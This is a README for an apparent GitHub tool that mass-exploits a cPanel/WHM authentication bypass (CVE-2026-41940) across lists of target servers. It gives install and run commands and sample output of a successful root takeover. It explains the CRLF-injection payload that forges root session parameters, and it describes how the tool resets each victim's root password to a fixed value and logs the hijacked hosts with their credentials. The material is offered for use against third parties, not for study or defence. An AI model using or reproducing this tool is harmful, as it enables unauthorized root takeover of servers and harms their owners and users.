
Bulk scanner and mass exploitation tool for CVE-2026-41940 on cPanel/WHM, built for automated target validation and high-speed multi-threaded execution.
CVE-2026-41940 is a critical authentication bypass vulnerability in WHM/cPanel that allows attackers to bypass authentication and gain root access to a server without valid credentials. The vulnerability leverages CRLF injection in the session handling mechanism to inject malicious session parameters.
This tool provides mass exploitation capabilities with multi-threading support for testing multiple targets simultaneously, featuring intelligent success detection and automatic filtering of invalid targets.
| Feature | Description |
|---|---|
| β Mass Exploitation | Scan and exploit multiple targets from a list file |
| π Multi-threading | Configurable thread count for faster scanning (default: 15) |
| π Auto Password Change | Changes root password to Jenderal92 on successful exploit |
| π‘οΈ Smart Success Detection | Automatically detects various WHM API response formats |
| β οΈ License Error Filtering | Excludes targets with invalid/cannot read license errors |
| π Structured Output | Saves only confirmed successes in `domain:port |
| π‘οΈ SSL/TLS Support | Handles self-signed certificates automatically |
| π Session Management | Automatic session extraction, cookie injection, and token handling |
| β±οΈ Timeout Control | Configurable connection timeout (default: 15 seconds) |
| π Pre-connection Check | Verifies port availability before exploitation attempt |
| π Real-time Progress | Shows detailed progress for each exploitation stage |
pip install requests urllib3 futures
Or use requirements.txt:
requests==2.27.1
urllib3==1.26.18
futures==3.4.0
# Clone repository
git clone https://github.com/Jenderal92/CVE-2026-41940.git
cd CVE-2026-41940
# Install dependencies
pip install -r requirements.txt
# Make executable (Linux/Mac)
chmod +x CVE-2026-41940.py
Create a targets.txt file with one target per line:
https://target1.com:2087
target2.com
127.0.0.1:2087
http://target3.com:2087
target4.com
Note: Port
2087is the default WHM port. If not specified, it will automatically use port 2087. HTTP/HTTPS prefix will be added automatically if missing.
python2 CVE-2026-41940.py targets.txt
# Use 5 concurrent threads
python2 CVE-2026-41940.py targets.txt --threads 5
# Use 20 threads for faster scanning
python2 CVE-2026-41940.py targets.txt --threads 20
# Override Host header for all targets
python2 CVE-2026-41940.py targets.txt --hostname custom.host.com --threads 10
# Set timeout to 30 seconds for slow connections
python2 CVE-2026-41940.py targets.txt --threads 10 --timeout 30
| Argument | Description | Default | Required |
|---|---|---|---|
list_file | File containing target list (one per line) | - | β Yes |
--threads | Number of concurrent threads | 15 | β No |
--hostname | Override Host header for all targets | Auto-discover | β No |
--timeout | Connection timeout in seconds | 15 | β No |
res.txt)Only confirmed successful exploits are saved. Targets with license errors, failed password changes, or connection issues are automatically excluded.
Format:
domain:port|root|Jenderal92
Example output:
www.example.com:2087|root|Jenderal92
127.0.0.1:2087|root|Jenderal92
target.example.net:2087|root|Jenderal92
The following targets will NOT be saved to res.txt:
Cannot Read License File)$ python2 CVE-2026-41940.py targets.txt --threads 10
CVE-2026-41940 bypass authentication - Mass Exploit
[*] Loaded 4 targets
[*] Starting exploit with 10 threads...
[*] Timeout: 15 seconds
[*] Note: http:// will be added automatically if missing
[*] ONLY targets with confirmed password changes will be saved to res.txt
[*] Targets with license errors, connection issues, or failed password changes will be EXCLUDED
==================================================
[*] Checking target: 127.0.0.1
Original input: 127.0.0.1
Normalized: https://127.0.0.1:2087
Port 2087: OPEN
Testing connection... OK (HTTP 200)
[0] hostname = example.com
[1] minting a preauth session...
session base = :d5nPe99Nx9HQdMu2
[2] sending the CRLF injection...
HTTP 307, leaked token = /cpsess0488087910
[3] firing do_token_denied to propagate...
HTTP 401, gadget fired
[4] verifying we're WHM root...
/json-api/version -> HTTP 200 {"version":"11.118.0.13"}
[*] attempting to change the root password
passwd -> HTTP 200
{
"data": {
"app": ["system"]
},
"metadata": {
"output": {
"raw": "Password for \"root\" has been changed."
},
"reason": "Password changed for user \"root\".",
"version": 1,
"command": "passwd",
"result": 1
}
}
[+] Password change confirmed (metadata.result=1)
[+] β Root password successfully changed to 'Jenderal92'!
[β] SUCCESS & SAVED: 127.0.0.1:2087
Saved to res.txt: 127.0.0.1:2087|root|Jenderal92
==================================================
[*] Scan complete!
[*] Targets with successfully changed passwords: 1 out of 4
[+] Results saved to res.txt
Successfully exploited targets (password changed to Jenderal92):
β 127.0.0.1:2087
The exploit consists of 4 main stages with intelligent verification:
[1] minting a preauth session...
/login/?login_only=1 with invalid credentialswhostmgrsession cookie from the server response,<obhex> portion[2] sending the CRLF injection...
Authorization: Basic header containing malicious payloadroot:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1
\r\n) characters inject fake session parametersLocation header containing the cp_security_token[3] firing do_token_denied to propagate...
/scripts2/listaccts endpoint with the manipulated cookiedo_token_denied mechanism in WHM